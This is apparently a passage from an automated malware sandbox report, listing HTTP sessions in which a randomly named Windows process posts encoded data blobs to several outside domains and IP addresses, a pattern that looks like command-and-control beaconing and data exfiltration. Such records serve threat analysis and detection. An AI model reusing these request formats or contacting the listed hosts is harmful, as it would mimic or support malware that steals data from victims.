                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--fhq1c541j0zr.com
                Origin: http://www.xn--fhq1c541j0zr.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 219
                Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: lH=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIEIW3F67C/BT8hRH8hbTZ+x/pc3m/SaRGZ1mhACkMC7kRcIa2nHuzxQo+/eausIQK0qZ56L/TOyi3cWWeVgSWACV+ka/ms7PAaHB8FfhTcj3t86NnkTl4GdoWhlPbcWbdAoWe0RGVE8SMgOUtFMWf7lsSxIxAiNwqCEz85/7zqW4fpw=


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                11 | 192.168.2.4 | 61885 | 43.252.167.188 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:27:45.457448006 CEST | 10892 | OUT | POST /rm91/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--fhq1c541j0zr.com
                Origin: http://www.xn--fhq1c541j0zr.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10299
                Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: lH=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 [TRUNCATED]
                Aug 19, 2024 04:27:46.320158958 CEST | 367 | IN | HTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:35:28 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                12 | 192.168.2.4 | 61886 | 43.252.167.188 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:27:47.997513056 CEST | 513 | OUT | GET /rm91/?Cj=Qhv8RTO8YPvh6L30&lH=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.xn--fhq1c541j0zr.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 19, 2024 04:27:57.855218887 CEST | 367 | IN | HTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:35:39 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                13 | 192.168.2.4 | 61887 | 194.9.94.85 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:28:02.964535952 CEST | 790 | OUT | POST /4hda/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--matfrmn-jxa4m.se
                Origin: http://www.xn--matfrmn-jxa4m.se
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 199
                Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: lH=zHwxZv4P/D2M/HgIWnk2CFJDYZ5S/Z0sU36VMx+DoXvtoKSWfGMjykMFp0BugFrtXYjwWTOVQM+mD2QtmJvBwcnW8BJXszqK53QvBtmb2dmrkDiC3+fVRvfJpAj3TzUCWZtDSRY8EofKkgwCLq3gd5PmYC6yAoE2Xcn0YsAFCf25LK9UtYZYtguArXbU8G4Hcw==
                Aug 19, 2024 04:28:03.640505075 CEST | 1236 | IN | HTTP/1.1 200 OK
                Server: nginx
                Date: Mon, 19 Aug 2024 02:28:03 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                X-Powered-By: PHP/8.1.29
                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                Aug 19, 2024 04:28:03.640563011 CEST | 1236 | IN
                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                Aug 19, 2024 04:28:03.640599012 CEST | 1236 | IN
                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                Aug 19, 2024 04:28:03.640630960 CEST | 1236 | IN
                Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                Aug 19, 2024 04:28:03.640666008 CEST | 878 | IN
                Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                14 | 192.168.2.4 | 61888 | 194.9.94.85 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:28:05.499008894 CEST | 810 | OUT | POST /4hda/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--matfrmn-jxa4m.se
                Origin: http://www.xn--matfrmn-jxa4m.se
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 219
                Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: lH=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boF7tvuWWeHMjxkMF7UAlulr6XY/4WSyVQM6mDyUtm+DCxMnU0hJRozqK53QvBtD22d+rnzSC2c3KbPe7uAj3EjVFWZszSU4WEq3Kkk0CLYPjOZOtXi6nPIE5QPKJRro/NtmlHssO8p4P/gKz2QSgxFFOH0w4ORJyMD8I4q7Dy/Rqpn4=
                Aug 19, 2024 04:28:06.168071985 CEST | 1236 | IN | HTTP/1.1 200 OK
                Server: nginx
                Date: Mon, 19 Aug 2024 02:28:06 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                X-Powered-By: PHP/8.1.29
                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                Aug 19, 2024 04:28:06.168123007 CEST | 1236 | IN
                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                Aug 19, 2024 04:28:06.168159008 CEST | 1236 | IN
                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                Aug 19, 2024 04:28:06.168190956 CEST | 1236 | IN
                Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                Aug 19, 2024 04:28:06.168229103 CEST | 878 | IN
                Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                15 | 192.168.2.4 | 61889 | 194.9.94.85 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:28:08.027833939 CEST | 10892 | OUT | POST /4hda/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--matfrmn-jxa4m.se
                Origin: http://www.xn--matfrmn-jxa4m.se
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10299
                Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: lH=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boFjtvbCWfk0jwkMFgUBiulq4XY38WS+vQOSmCXAtkL3Co8nU2hJQszre53ArBtz22d+rnxKCg+fKUvfJpAjzTzUiWZ1LSU8sEaXKkAQCYL3jN5OvQi7iPIJ5QOnlRuUVNv6lW9sRjNIOsgGK1R2R92VTf0xEDzhSd2cFyreor8Nb7yPmem3/g9kRZ686OYdNBwZmyj5x3Q+yw0QnmfdpFAuFpXB2EQ1xbYr1fY+EkEFf3QTXipK5ik/RtJIfXS+vdS2Rkudgo0lnjklgzC2n2IK0Z2FbnuZIkhww/nkWim2hmqaT2OphONFeQMYrNBQ1VrkZqo5Fe+PIblPuXmZOwytYQ6Uzw2YGRa/rzQ+dYkLieKKzvIDTPNaHI4sLbLzerzUNaC0/MVLZT37ySpk5CXopLFmdJfVhRcwa4qnf3Z6XHe1RCxMgt+O2tzA/SU7bYvVWcJwysssdO9TPcuF+murPDQHN0WpQdiiJjNew1/U7+BqVoEXIhYW83o/ZXFh9UcKO3+MYz+199jGUI+2blszQQQqrHxvao5WCZNsaGcqOAYVbgQWlTOpTAtp5yMbe29opIqDFrLL0sQLelAjXBT2Cy7EQP2ELzdMPouQkwvUufwxyOTtHhqfqp9MFXVTJc7N0c2123UN7gN8ZctWHe1nIqZN6OTm6yw9UDiknTs8Edr/Zp69waFmdsZIKYSvqNY60QLu4zOXeD9eCtTRa/2DrQ9DBilsmrNaF5rf/0jUcFYokV5aQtfoAX1ROpqBSCH4d3SemCk3f/HHb77DqCufk35+CnN0K/7B4t8cTKAlFTUlFarlhLHYXKb/jWluD/IzP++JQL1qnziFXnhG1jiYS8pRwSEcmF/R4A5IMYKSCSwFXEjRN6uHopYIaXiopH1GgvaF0kx8a5D2ypsRvcFtUvBAAlv62+6uXWdW0eHXhBVRyuISs0NkBNwQ37x5v0LLr25XLW [TRUNCATED]
                Aug 19, 2024 04:28:08.800591946 CEST | 1236 | IN | HTTP/1.1 200 OK
                Server: nginx
                Date: Mon, 19 Aug 2024 02:28:08 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                X-Powered-By: PHP/8.1.29
                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                Aug 19, 2024 04:28:08.800633907 CEST | 224 | IN
                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
                Aug 19, 2024 04:28:08.800712109 CEST | 1236 | IN
                Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
                Aug 19, 2024 04:28:08.800749063 CEST | 1236 | IN
                Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
                Aug 19, 2024 04:28:08.800781965 CEST448INData Raw: 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 69 61 20 43 75 73 74 6f 6d 65 72 20
                Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
                Aug 19, 2024 04:28:08.800832987 CEST1236INData Raw: 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20 6f 6e 6c 69 6e 65 20 73 74 6f 72 65 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 3c 75 6c 3e 0a 09 09 09
                Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
                Aug 19, 2024 04:28:08.800863028 CEST206INData Raw: 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70
                Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                16 | 192.168.2.4 | 61890 | 194.9.94.85 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:28:10.561928034 CEST | 513 | OUT | GET /4hda/?lH=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.xn--matfrmn-jxa4m.se
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 19, 2024 04:28:11.205013037 CEST | 1236 | IN | HTTP/1.1 200 OK
                Server: nginx
                Date: Mon, 19 Aug 2024 02:28:11 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                X-Powered-By: PHP/8.1.29
                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                17 | 192.168.2.4 | 61891 | 23.251.54.212 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:28:16.811882973 CEST | 757 | OUT | POST /li0t/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.anuts.top
                Origin: http://www.anuts.top
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 199
                Referer: http://www.anuts.top/li0t/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: lH=RXwfOcHa9T4Mpn/yRQhYjJbVVIsh32JdFO0SSmNU3uRWSn7x3BFiHUjPi8l4CKmufuCpkwc+g7o+FeaCvo5evyniUr8TMjJxuBAFpS5EaEVh5zCiG8CpFKLuwTXi6kly2JJN3AsSB7ges1utpw15k9UGUs5T5Y9l38NVYF76zHtC2NVBmDE4k7TEgYJuNwMEHQ==


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                18 | 192.168.2.4 | 61892 | 23.251.54.212 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:28:19.346071959 CEST | 777 | OUT | POST /li0t/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.anuts.top
                Origin: http://www.anuts.top
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 219
                Referer: http://www.anuts.top/li0t/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: lH=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YBWSGLx2DtiAUjPsckyc6mpfuGhk1k+g78+FaWCv7hRuingMb8dIjJxuBAFpS8ZaAxh4DSiFY2ub6LpmjXip0l22JJ/3FI0B9keswKtqh16/NUMKc4n3LI11N4JW2P51ncn6rEb3ylv27339fAaAzxNcWsffKBEnpXN8Bg+X9feRoM=


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                19 | 192.168.2.4 | 61893 | 23.251.54.212 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:28:21.887839079 CEST | 10859 | OUT | POST /li0t/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.anuts.top
                Origin: http://www.anuts.top
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10299
                Referer: http://www.anuts.top/li0t/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                20 | 192.168.2.4 | 61894 | 23.251.54.212 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:28:24.420876026 CEST | 502 | OUT | GET /li0t/?Cj=Qhv8RTO8YPvh6L30&lH=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.anuts.top
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                21 | 192.168.2.4 | 61895 | 199.192.19.19 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:28:50.861352921 CEST | 769 | OUT | POST /ei85/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.telwisey.info
                Origin: http://www.telwisey.info
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 199
                Referer: http://www.telwisey.info/ei85/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: lH=DTOKciQymv5BKJPNnpMdZc+SHA8TErrFnmydaMNwroMJ0K//6QUyT3VFYEiKcJx2CE+n0cts7L5paW2wHvRPmSp2CgzgvBTnj18tMklHYhd1oEGMP+lutG6MI8RGhYBSOKLK3Q76fsb5MCfWnVtk3Y1yxRXl9+J34NKW/08Q7aou5IDFwIw0W/4jDnt68m/tiA==
                Aug 19, 2024 04:28:51.482146025 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:28:51 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                22 | 192.168.2.4 | 61896 | 199.192.19.19 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
